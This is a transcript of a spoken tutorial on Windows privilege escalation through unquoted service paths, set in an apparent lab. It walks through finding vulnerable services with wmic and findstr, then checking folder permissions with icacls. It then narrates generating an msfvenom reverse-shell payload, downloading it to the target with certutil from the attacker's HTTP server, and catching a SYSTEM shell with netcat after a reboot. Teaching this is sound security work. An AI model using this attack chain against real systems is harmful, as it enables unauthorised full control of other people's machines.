Hello and welcome back to another episode of Let's Struggle with Rob. This time we're going to cover Windows privilege escalation using unquoted paths. So what's an unquoted service path? It's when a service is created and the path to the executable might have spaces in it. Kind of like this, where we have SC create a vulnerable service and the path has a space between program and files. There's a space between A and subfolder, a space between B and subfolder, a space between C and subfolder, and then eventually the file we want to run for our service. So why is this important? Well, the way Windows runs services makes it a potential vulnerability that can be exploited to gain a privileged access to the system. So when Windows goes to run this service, it's going to get to the space after the word program, and it's going to say, oh, you want to run C program.exe, which doesn't exist, so it's going to go, oh, nope, that wasn't it. Let's go to C program files / and then it sees A and the space between subfolders says, oh, you want to run AEXE, and the subfolder and everything else must just be an argument. But that fails, so then it's going to try and go one level deeper, and it's going to see that there's a B.exe it wants to run because it sees that space. And that's going to continue on and on until it finally gets to the actual executable that it's going to run. This becomes a vulnerability because if we have the ability to write to, say, the A subfolder, we can put our own program in there called B.exe, and that is going to run instead of the executable that was intended to run as the service. And not only is that going to run, but it's going to run at whatever security level this service was going to run at, which by default is almost always system. So we're going to try it out here. In this example, we're starting out, we already have a connection to the server using Bob Marshmallow's account. We managed to get Bob's login information through a phishing campaign, and we've connected to the Bad Wolf DC server as Bob, and he only has user rights. He has no rights really to do anything else on the box. He can just log in. But we're going to leverage unquoted service path to elevate to system access. So to do that, and I'll show you in just a moment here, we're going to do that by finding the unquoted service path. To do that, we're simply going to run this command, wmic service, and we tell it to get the name, path name, display name, and start mode of all the services. Then we're going to pipe that into find string /i, that means ignore case, and we're looking for the word auto, so we're looking for services that automatically start. But then we're going to take all those results and we're going to pipe that into another find string, tell it to ignore case, and this /v means accept this argument. So we don't want anything that has C/Windows/ we have to do double slashes to make that work. We don't want anything that has Windows in the path because by default it's going to be in a folder as a regular user we don't get to write to. And then we're going to take all of those answers that are left and pipe them into find string, and we're looking for any of those services that are left that don't have a quote in them. So that's how we're going to start this out. So let's take a look at this in action. So here we are, we're logged in as Bob M. We're in as Bob M using a netcat session here. So we have a reverse shell to the server as Bob. So the first thing we're going to do is start our search to try and find the unquoted service, see if there is one on the box. So again, as I had mentioned earlier, we're just going to run this command. We want to get the name, the path name, display name, and start mode of all the services, and then we're going to just keep piping that into different find strings till we get to the result where it only tells us services that have a space in the name with no quotes. So okay, and so there we have it. We see we have one service, AAA vulnerable, vulnerable spelt wrong, and that is located in C program files, A space subfolder, B space subfolder, C space subfolder, fake service, exe, and it's auto start. So now we have a path. Now we just need to find out whether or not we can get into a folder to hijack it. So to use that, we're going to check the ACLs for the directory. So we'll start out with ICACLS, and we'll check program files. We know that's not a valid spot to start because there's not a program. I mean, if we could write directly to program files, we could put in program exe. Not likely. And then we'll just step through the rest of the folder. So we'll do the ACLS, C program files, A subfolder. And what we're looking for is W writes or write writes to either the local user group or our compromised account, Bad Wolf Bob M. So let's jump back to that. And I'll show you real quick here too how spaces come into play. We're going to try and do the ACACLS, and we'll do it on program files, but because there's a space, you see it says invalid parameter files. So it was looking for the ACLs for the directory C program and just takes files as an argument because there's no quotes. And when we do it with the quotes, we can see what we already knew, which is there's not really any write rights available to users in this. So now we're going to try and go one more folder deep. We're going to check the A subfolder. And what we see here is we do have built-in users have write, which means we could put our program to hijack it right here in the A subfolder. We also see above it that Bob M and Jeff M users also have write access. So in this case, even our hijacked account for Bob M would have this ability to write to this folder. So for right now, we're going to go ahead and switch to this folder just to get ready. And now what we're going to need to do is head back to a different tab here. And what we're going to do is create a program called b.exe that we can put in line so that we can take over this service. We're going to use MSF Venom to do this, and the command is MSF Venom TAC P for payload. We're doing Windows/shell _ reverse _ TCP. When you have underscores in an MSF Venom, that means it's a non-staged payload, which means it's one file that you send over all at once. If you have dashes or just more slashes, what you get is partial pieces of the payload sent over and then assembled on the victim machine. But anyway, our payload Windows shell reverse TCP, so we can get another reverse shell. For localhost, we're just putting F0 because that is the NIC that's live on our attacking machine, and it'll just automatically grab the correct IP address and everything from that. For local port, we're going to use, this says 1337, but we're actually going to use 31337. And then we're going to export to a file type of exe, and we're going to output it with the file name b.exe. Okay, now we've got our file. That doesn't take too long to go. Now what we need to do is we need to get this over to our victim machine. So to get the file to Windows, what we're going to do on our attacking machine is we're going to run Python 3 TAC-M for module. We're going to tell it to run the HTTP server on port 8000. Then back on our Windows connection that we have, where we're logged in as Bob, we're going to use a certificate utility to sneak the file onto the box. So to do that, we're going to run certutil exe tac URL cache, and then the file is going to be tacf, the address of our attacking machine, /b, and we're going to save it as bexe. This is actually incorrect on the slide here. That should be :8000 after the 122 because we need to specify the port. So then after we've got all that done and on the machine, then we can just set up another netcat session with the proper port. Again, we're going to use 31337 instead of 1337. And after we've done that, all we have to do is wait for a reboot. So let's watch that in action. Going to switch tabs here and start our temporary web server in its own tab. So now we're running a web server on port 8000, and everything in our current directory will be served up as a web page. And now we've switched back to the Windows connection where we're logged in as Bob, and we're going to run the certutil command. And again, 192.168.0.122:8000, and then bexe, and we want to just save it as bexe in the current folder, which is a subfolder. So now we can see that command has completed successfully. So we can kill our web server. We've killed our connection as Bob. And now we're just going to run netcat nlvp port 31337. And now we just have to wait. Well, Bob doesn't have the proper rights to restart a service, so we're just going to wait for a reboot. And we're going to force a reboot here for demonstration purposes. So in just a moment here, okay, our server's rebooting. In this case, we could just say maybe it was planned Windows updates ran and the server reboot for that, and we've just been sitting waiting forever for it. So as we sit here and watch, and there we go, the service went to start. It ran our program instead, and we are logged in as NT Authority System. We effectively have owned this box.